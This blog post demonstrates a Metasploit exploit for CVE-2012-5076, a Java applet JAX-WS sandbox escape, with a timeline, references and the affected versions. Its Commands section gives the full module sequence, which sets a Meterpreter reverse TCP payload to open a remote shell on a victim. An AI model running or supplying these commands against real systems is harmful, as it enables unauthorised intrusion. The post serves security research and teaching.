aka wow on ZATAZ.com
CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo
Timeline :
Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by @kafeine the 2012-11-09
Metasploit PoC provided by juan vazquez the 2012-11-11
PoC provided by :
Unknown
juan vazquez
Reference(s) :
CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”
Affected version(s) :
Java 1.7.0_07-b10 and earlier
Tested on Windows XP Pro SP3 with :
Java 1.7.0_07-b10
Description :
This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
Commands :
use exploit/multi/browser/java_jre17_jaxws set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sessions -i 1 getuid sysinfo
I recommend you to read these related posts
- CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo
- CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo
- CVE-2013-2423 – Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo
- CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo
- CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo
- CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo
- Cool Exploit Kit Remove Support of Java CVE-2012-1723
- CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit
- CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo
- Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo
Logging In...
Leave a Reply Cancel reply
Last reply was 6 months ago
[...] module to exploit Java up through Java 7, Update 7, using the recently patched CVE-2012-5076 flaw. Eric Romang has a [...]
Does it work on Windows 7? I tried 7U7 on Win7X64 but it doesn’t seem to work.